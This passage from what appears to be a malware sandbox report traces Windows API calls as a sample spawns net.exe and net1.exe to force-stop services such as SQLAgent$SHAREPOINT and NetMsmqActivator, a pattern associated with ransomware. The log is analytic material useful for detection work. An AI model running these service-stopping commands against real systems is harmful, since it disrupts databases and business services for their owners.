[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 387 os_tid = 0xb80 Process: id = "215" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c57d000" os_pid = "0x4b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xbd8" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 388 os_tid = 0x684 [0204.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fe10 | out: lpSystemTimeAsFileTime=0x35fe10*(dwLowDateTime=0x4311b040, dwHighDateTime=0x1d57a87)) [0204.484] GetCurrentProcessId () returned 0x4b8 [0204.484] GetCurrentThreadId () returned 0x684 [0204.484] GetTickCount () returned 0x116cbd8 [0204.484] QueryPerformanceCounter (in: lpPerformanceCount=0x35fe08 | out: lpPerformanceCount=0x35fe08*=32476897478) returned 1 [0204.485] GetModuleHandleA (lpModuleName=0x0) returned 0x360000 [0204.485] __set_app_type (_Type=0x1) [0204.485] __p__fmode () returned 0x74eb31f4 [0204.485] __p__commode () returned 0x74eb31fc [0204.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x36ffe6) returned 0x0 [0204.485] __getmainargs (in: _Argc=0x379064, _Argv=0x37906c, _Env=0x379068, _DoWildCard=0, _StartInfo=0x379024 | out: _Argc=0x379064, _Argv=0x37906c, _Env=0x379068) returned 0 [0204.485] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.485] GetConsoleOutputCP () returned 0x1b5 [0204.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x379080 | out: lpCPInfo=0x379080) returned 1 [0204.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.489] sprintf_s (in: _DstBuf=0x35fdc8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0204.489] setlocale (category=0, locale=".437") returned="English_United States.437" [0204.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0204.491] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0204.491] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SHAREPOINT /y" [0204.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fb94, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0204.492] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x7a) returned 0x4e3c20 [0204.492] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0204.492] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fd98 | out: Buffer=0x35fd98*=0x4e1c80) returned 0x0 [0204.492] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fd98 | out: Buffer=0x35fd98*=0x4e1c98) returned 0x0 [0204.492] _fileno (_File=0x74eb2900) returned -2 [0204.492] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0204.492] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0204.492] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0204.492] _wcsicmp (_String1="config", _String2="stop") returned -16 [0204.492] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0204.492] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0204.492] _wcsicmp (_String1="file", _String2="stop") returned -13 [0204.492] _wcsicmp (_String1="files", _String2="stop") returned -13 [0204.492] _wcsicmp (_String1="group", _String2="stop") returned -12 [0204.492] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0204.492] _wcsicmp (_String1="help", _String2="stop") returned -11 [0204.492] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0204.493] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0204.493] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0204.493] _wcsicmp (_String1="session", _String2="stop") returned -15 [0204.493] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0204.493] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0204.493] _wcsicmp (_String1="share", _String2="stop") returned -12 [0204.493] _wcsicmp (_String1="start", _String2="stop") returned -14 [0204.493] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0204.493] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0204.493] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0204.493] _wcsicmp (_String1="accounts", _String2="SQLAgent$SHAREPOINT") returned -18 [0204.493] _wcsicmp (_String1="computer", _String2="SQLAgent$SHAREPOINT") returned -16 [0204.493] _wcsicmp (_String1="config", _String2="SQLAgent$SHAREPOINT") returned -16 [0204.493] _wcsicmp (_String1="continue", _String2="SQLAgent$SHAREPOINT") returned -16 [0204.493] _wcsicmp (_String1="cont", _String2="SQLAgent$SHAREPOINT") returned -16 [0204.493] _wcsicmp (_String1="file", _String2="SQLAgent$SHAREPOINT") returned -13 [0204.493] _wcsicmp (_String1="files", _String2="SQLAgent$SHAREPOINT") returned -13 [0204.493] _wcsicmp (_String1="group", _String2="SQLAgent$SHAREPOINT") returned -12 [0204.493] _wcsicmp (_String1="groups", _String2="SQLAgent$SHAREPOINT") returned -12 [0204.493] _wcsicmp (_String1="help", _String2="SQLAgent$SHAREPOINT") returned -11 [0204.493] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SHAREPOINT") returned -11 [0204.493] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SHAREPOINT") returned -7 [0204.493] _wcsicmp (_String1="pause", _String2="SQLAgent$SHAREPOINT") returned -3 [0204.493] _wcsicmp (_String1="session", _String2="SQLAgent$SHAREPOINT") returned -12 [0204.493] _wcsicmp (_String1="sessions", _String2="SQLAgent$SHAREPOINT") returned -12 [0204.493] _wcsicmp (_String1="sess", _String2="SQLAgent$SHAREPOINT") returned -12 [0204.493] _wcsicmp (_String1="share", _String2="SQLAgent$SHAREPOINT") returned -9 [0204.493] _wcsicmp (_String1="start", _String2="SQLAgent$SHAREPOINT") returned 3 [0204.493] _wcsicmp (_String1="stats", _String2="SQLAgent$SHAREPOINT") returned 3 [0204.493] _wcsicmp (_String1="statistics", _String2="SQLAgent$SHAREPOINT") returned 3 [0204.493] _wcsicmp (_String1="stop", _String2="SQLAgent$SHAREPOINT") returned 3 [0204.493] _wcsicmp (_String1="time", _String2="SQLAgent$SHAREPOINT") returned 1 [0204.493] _wcsicmp (_String1="user", _String2="SQLAgent$SHAREPOINT") returned 2 [0204.493] _wcsicmp (_String1="users", _String2="SQLAgent$SHAREPOINT") returned 2 [0204.493] _wcsicmp (_String1="msg", _String2="SQLAgent$SHAREPOINT") returned -6 [0204.493] _wcsicmp (_String1="messenger", _String2="SQLAgent$SHAREPOINT") returned -6 [0204.493] _wcsicmp (_String1="receiver", _String2="SQLAgent$SHAREPOINT") returned -1 [0204.493] _wcsicmp (_String1="rcv", _String2="SQLAgent$SHAREPOINT") returned -1 [0204.494] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SHAREPOINT") returned -5 [0204.494] _wcsicmp (_String1="redirector", _String2="SQLAgent$SHAREPOINT") returned -1 [0204.494] _wcsicmp (_String1="redir", _String2="SQLAgent$SHAREPOINT") returned -1 [0204.494] _wcsicmp (_String1="rdr", _String2="SQLAgent$SHAREPOINT") returned -1 [0204.494] _wcsicmp (_String1="workstation", _String2="SQLAgent$SHAREPOINT") returned 4 [0204.494] _wcsicmp (_String1="work", _String2="SQLAgent$SHAREPOINT") returned 4 [0204.494] _wcsicmp (_String1="wksta", _String2="SQLAgent$SHAREPOINT") returned 4 [0204.494] _wcsicmp (_String1="prdr", _String2="SQLAgent$SHAREPOINT") returned -3 [0204.494] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SHAREPOINT") returned -15 [0204.494] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SHAREPOINT") returned -7 [0204.494] _wcsicmp (_String1="server", _String2="SQLAgent$SHAREPOINT") returned -12 [0204.494] _wcsicmp (_String1="svr", _String2="SQLAgent$SHAREPOINT") returned 5 [0204.494] _wcsicmp (_String1="srv", _String2="SQLAgent$SHAREPOINT") returned 1 [0204.494] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SHAREPOINT") returned -7 [0204.494] _wcsicmp (_String1="alerter", _String2="SQLAgent$SHAREPOINT") returned -18 [0204.494] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SHAREPOINT") returned -5 [0204.494] _wcsupr (in: _String="SQLAgent$SHAREPOINT" | out: _String="SQLAGENT$SHAREPOINT") returned="SQLAGENT$SHAREPOINT" [0204.494] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e54f0 [0204.497] GetServiceKeyNameW (in: hSCManager=0x4e54f0, lpDisplayName="SQLAGENT$SHAREPOINT", lpServiceName=0x37aaf0, lpcchBuffer=0x35fd34 | out: lpServiceName="", lpcchBuffer=0x35fd34) returned 0 [0204.498] _wcsicmp (_String1="msg", _String2="SQLAGENT$SHAREPOINT") returned -6 [0204.498] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SHAREPOINT") returned -6 [0204.498] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SHAREPOINT") returned -1 [0204.498] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SHAREPOINT") returned -1 [0204.498] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SHAREPOINT") returned -1 [0204.498] _wcsicmp (_String1="redir", _String2="SQLAGENT$SHAREPOINT") returned -1 [0204.498] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SHAREPOINT") returned -1 [0204.498] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SHAREPOINT") returned 4 [0204.498] _wcsicmp (_String1="work", _String2="SQLAGENT$SHAREPOINT") returned 4 [0204.498] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SHAREPOINT") returned 4 [0204.498] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SHAREPOINT") returned -3 [0204.498] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SHAREPOINT") returned -15 [0204.498] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SHAREPOINT") returned -7 [0204.498] _wcsicmp (_String1="server", _String2="SQLAGENT$SHAREPOINT") returned -12 [0204.498] _wcsicmp (_String1="svr", _String2="SQLAGENT$SHAREPOINT") returned 5 [0204.498] _wcsicmp (_String1="srv", _String2="SQLAGENT$SHAREPOINT") returned 1 [0204.498] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SHAREPOINT") returned -7 [0204.498] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SHAREPOINT") returned -18 [0204.498] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SHAREPOINT") returned -5 [0204.498] NetServiceControl (in: servername=0x0, service="SQLAGENT$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x35fd30 | out: bufptr=0x35fd30) returned 0x889 [0204.499] wcscpy_s (in: _Destination=0x37a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0204.499] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0204.500] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x37b338, nSize=0x800, Arguments=0x379dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0204.501] GetFileType (hFile=0x26c) returned 0x3 [0204.501] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e4020 [0204.501] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nM", lpUsedDefaultChar=0x0) returned 30 [0204.501] WriteFile (in: hFile=0x26c, lpBuffer=0x4e4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fc70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc70, lpOverlapped=0x0) returned 0 [0204.501] LocalFree (hMem=0x4e4020) returned 0x0 [0204.501] GetFileType (hFile=0x26c) returned 0x3 [0204.501] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e62c8 [0204.501] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0204.501] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fc70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc70, lpOverlapped=0x0) returned 0 [0204.501] LocalFree (hMem=0x4e62c8) returned 0x0 [0204.501] _ultow (in: _Dest=0x889, _Radix=3538080 | out: _Dest=0x889) returned="2185" [0204.502] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x37b338, nSize=0x800, Arguments=0x379dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0204.502] GetFileType (hFile=0x26c) returned 0x3 [0204.502] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e62c8 [0204.502] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0204.502] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fc7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc7c, lpOverlapped=0x0) returned 0 [0204.502] LocalFree (hMem=0x4e62c8) returned 0x0 [0204.502] GetFileType (hFile=0x26c) returned 0x3 [0204.502] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e62c8 [0204.502] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0204.502] WriteFile (in: hFile=0x26c, lpBuffer=0x4e62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fc7c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc7c, lpOverlapped=0x0) returned 0 [0204.502] LocalFree (hMem=0x4e62c8) returned 0x0 [0204.502] NetApiBufferFree (Buffer=0x4e1c80) returned 0x0 [0204.503] NetApiBufferFree (Buffer=0x4e1c98) returned 0x0 [0204.503] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SHAREPOINT /y" [0204.503] exit (_Code=2) Process: id = "216" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x646e0000" os_pid = "0x550" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop NetMsmqActivator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 389 os_tid = 0x150 Process: id = "217" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x13b73000" os_pid = "0x7f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "216" os_parent_pid = "0x550" cmd_line = "C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 390 os_tid = 0xb08 [0204.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfcf0 | out: lpSystemTimeAsFileTime=0x1dfcf0*(dwLowDateTime=0x43297e00, dwHighDateTime=0x1d57a87)) [0204.639] GetCurrentProcessId () returned 0x7f8 [0204.639] GetCurrentThreadId () returned 0xb08 [0204.639] GetTickCount () returned 0x116cc74 [0204.639] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfce8 | out: lpPerformanceCount=0x1dfce8*=32492386026) returned 1 [0204.639] GetModuleHandleA (lpModuleName=0x0) returned 0x670000 [0204.640] __set_app_type (_Type=0x1) [0204.640] __p__fmode () returned 0x74eb31f4 [0204.640] __p__commode () returned 0x74eb31fc [0204.640] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x67ffe6) returned 0x0 [0204.640] __getmainargs (in: _Argc=0x689064, _Argv=0x68906c, _Env=0x689068, _DoWildCard=0, _StartInfo=0x689024 | out: _Argc=0x689064, _Argv=0x68906c, _Env=0x689068) returned 0 [0204.640] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.640] GetConsoleOutputCP () returned 0x1b5 [0204.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x689080 | out: lpCPInfo=0x689080) returned 1 [0204.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.643] sprintf_s (in: _DstBuf=0x1dfca8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0204.643] setlocale (category=0, locale=".437") returned="English_United States.437" [0204.645] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0204.645] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0204.645] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" [0204.645] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1dfa74, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0204.646] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0x74) returned 0x86f788 [0204.646] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0204.646] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfc78 | out: Buffer=0x1dfc78*=0x871c78) returned 0x0 [0204.646] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfc78 | out: Buffer=0x1dfc78*=0x871c90) returned 0x0 [0204.646] _fileno (_File=0x74eb2900) returned -2 [0204.646] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0204.646] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0204.646] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0204.646] _wcsicmp (_String1="config", _String2="stop") returned -16 [0204.646] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0204.646] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0204.646] _wcsicmp (_String1="file", _String2="stop") returned -13 [0204.646] _wcsicmp (_String1="files", _String2="stop") returned -13 [0204.646] _wcsicmp (_String1="group", _String2="stop") returned -12 [0204.646] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0204.646] _wcsicmp (_String1="help", _String2="stop") returned -11 [0204.646] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0204.646] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0204.646] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0204.646] _wcsicmp (_String1="session", _String2="stop") returned -15 [0204.647] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0204.647] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0204.647] _wcsicmp (_String1="share", _String2="stop") returned -12 [0204.647] _wcsicmp (_String1="start", _String2="stop") returned -14 [0204.647] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0204.647] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0204.647] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0204.647] _wcsicmp (_String1="accounts", _String2="NetMsmqActivator") returned -13 [0204.647] _wcsicmp (_String1="computer", _String2="NetMsmqActivator") returned -11 [0204.647] _wcsicmp (_String1="config", _String2="NetMsmqActivator") returned -11 [0204.647] _wcsicmp (_String1="continue", _String2="NetMsmqActivator") returned -11 [0204.647] _wcsicmp (_String1="cont", _String2="NetMsmqActivator") returned -11 [0204.647] _wcsicmp (_String1="file", _String2="NetMsmqActivator") returned -8 [0204.647] _wcsicmp (_String1="files", _String2="NetMsmqActivator") returned -8 [0204.647] _wcsicmp (_String1="group", _String2="NetMsmqActivator") returned -7 [0204.647] _wcsicmp (_String1="groups", _String2="NetMsmqActivator") returned -7 [0204.647] _wcsicmp (_String1="help", _String2="NetMsmqActivator") returned -6 [0204.647] _wcsicmp (_String1="helpmsg", _String2="NetMsmqActivator") returned -6 [0204.647] _wcsicmp (_String1="localgroup", _String2="NetMsmqActivator") returned -2 [0204.647] _wcsicmp (_String1="pause", _String2="NetMsmqActivator") returned 2 [0204.647] _wcsicmp (_String1="session", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="sessions", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="sess", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="share", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="start", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="stats", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="statistics", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="stop", _String2="NetMsmqActivator") returned 5 [0204.647] _wcsicmp (_String1="time", _String2="NetMsmqActivator") returned 6 [0204.647] _wcsicmp (_String1="user", _String2="NetMsmqActivator") returned 7 [0204.647] _wcsicmp (_String1="users", _String2="NetMsmqActivator") returned 7 [0204.647] _wcsicmp (_String1="msg", _String2="NetMsmqActivator") returned -1 [0204.647] _wcsicmp (_String1="messenger", _String2="NetMsmqActivator") returned -1 [0204.647] _wcsicmp (_String1="receiver", _String2="NetMsmqActivator") returned 4 [0204.647] _wcsicmp (_String1="rcv", _String2="NetMsmqActivator") returned 4 [0204.647] _wcsicmp (_String1="netpopup", _String2="NetMsmqActivator") returned 3 [0204.647] _wcsicmp (_String1="redirector", _String2="NetMsmqActivator") returned 4 [0204.648] _wcsicmp (_String1="redir", _String2="NetMsmqActivator") returned 4 [0204.648] _wcsicmp (_String1="rdr", _String2="NetMsmqActivator") returned 4 [0204.648] _wcsicmp (_String1="workstation", _String2="NetMsmqActivator") returned 9 [0204.648] _wcsicmp (_String1="work", _String2="NetMsmqActivator") returned 9 [0204.648] _wcsicmp (_String1="wksta", _String2="NetMsmqActivator") returned 9 [0204.648] _wcsicmp (_String1="prdr", _String2="NetMsmqActivator") returned 2 [0204.648] _wcsicmp (_String1="devrdr", _String2="NetMsmqActivator") returned -10 [0204.648] _wcsicmp (_String1="lanmanworkstation", _String2="NetMsmqActivator") returned -2 [0204.648] _wcsicmp (_String1="server", _String2="NetMsmqActivator") returned 5 [0204.648] _wcsicmp (_String1="svr", _String2="NetMsmqActivator") returned 5 [0204.648] _wcsicmp (_String1="srv", _String2="NetMsmqActivator") returned 5 [0204.648] _wcsicmp (_String1="lanmanserver", _String2="NetMsmqActivator") returned -2 [0204.648] _wcsicmp (_String1="alerter", _String2="NetMsmqActivator") returned -13 [0204.648] _wcsicmp (_String1="netlogon", _String2="NetMsmqActivator") returned -1 [0204.648] _wcsupr (in: _String="NetMsmqActivator" | out: _String="NETMSMQACTIVATOR") returned="NETMSMQACTIVATOR" [0204.648] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x875460 [0204.651] GetServiceKeyNameW (in: hSCManager=0x875460, lpDisplayName="NETMSMQACTIVATOR", lpServiceName=0x68aaf0, lpcchBuffer=0x1dfc14 | out: lpServiceName="", lpcchBuffer=0x1dfc14) returned 0 [0204.651] _wcsicmp (_String1="msg", _String2="NETMSMQACTIVATOR") returned -1 [0204.651] _wcsicmp (_String1="messenger", _String2="NETMSMQACTIVATOR") returned -1 [0204.651] _wcsicmp (_String1="receiver", _String2="NETMSMQACTIVATOR") returned 4 [0204.651] _wcsicmp (_String1="rcv", _String2="NETMSMQACTIVATOR") returned 4 [0204.651] _wcsicmp (_String1="redirector", _String2="NETMSMQACTIVATOR") returned 4 [0204.651] _wcsicmp (_String1="redir", _String2="NETMSMQACTIVATOR") returned 4 [0204.651] _wcsicmp (_String1="rdr", _String2="NETMSMQACTIVATOR") returned 4 [0204.651] _wcsicmp (_String1="workstation", _String2="NETMSMQACTIVATOR") returned 9 [0204.651] _wcsicmp (_String1="work", _String2="NETMSMQACTIVATOR") returned 9 [0204.651] _wcsicmp (_String1="wksta", _String2="NETMSMQACTIVATOR") returned 9 [0204.651] _wcsicmp (_String1="prdr", _String2="NETMSMQACTIVATOR") returned 2 [0204.651] _wcsicmp (_String1="devrdr", _String2="NETMSMQACTIVATOR") returned -10 [0204.651] _wcsicmp (_String1="lanmanworkstation", _String2="NETMSMQACTIVATOR") returned -2 [0204.651] _wcsicmp (_String1="server", _String2="NETMSMQACTIVATOR") returned 5 [0204.652] _wcsicmp (_String1="svr", _String2="NETMSMQACTIVATOR") returned 5 [0204.652] _wcsicmp (_String1="srv", _String2="NETMSMQACTIVATOR") returned 5 [0204.652] _wcsicmp (_String1="lanmanserver", _String2="NETMSMQACTIVATOR") returned -2 [0204.652] _wcsicmp (_String1="alerter", _String2="NETMSMQACTIVATOR") returned -13 [0204.652] _wcsicmp (_String1="netlogon", _String2="NETMSMQACTIVATOR") returned -1 [0204.652] NetServiceControl (in: servername=0x0, service="NETMSMQACTIVATOR", opcode=0x0, arg=0x0, bufptr=0x1dfc10 | out: bufptr=0x1dfc10) returned 0x0 [0204.653] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1dfbec | out: Buffer=0x1dfbec*=0x877810) returned 0x0 [0204.653] OpenServiceW (hSCManager=0x875460, lpServiceName="NETMSMQACTIVATOR", dwDesiredAccess=0xc) returned 0x875578 [0204.653] QueryServiceStatus (in: hService=0x875578, lpServiceStatus=0x1dfbc0 | out: lpServiceStatus=0x1dfbc0*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0204.653] GetServiceDisplayNameW (in: hSCManager=0x875460, lpServiceName="NETMSMQACTIVATOR", lpDisplayName=0x691fc0, lpcchBuffer=0x1dfba4 | out: lpDisplayName="Net.Msmq Listener Adapter", lpcchBuffer=0x1dfba4) returned 1 [0204.654] NetApiBufferFree (Buffer=0x877810) returned 0x0 [0204.654] CloseServiceHandle (hSCObject=0x875578) returned 1 [0204.654] wcscpy_s (in: _Destination=0x68a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0204.654] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0204.655] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x68b338, nSize=0x800, Arguments=0x689dd8 | out: lpBuffer="The Net.Msmq Listener Adapter service is not started.\r\n") returned 0x37 [0204.656] GetFileType (hFile=0x26c) returned 0x3 [0204.656] 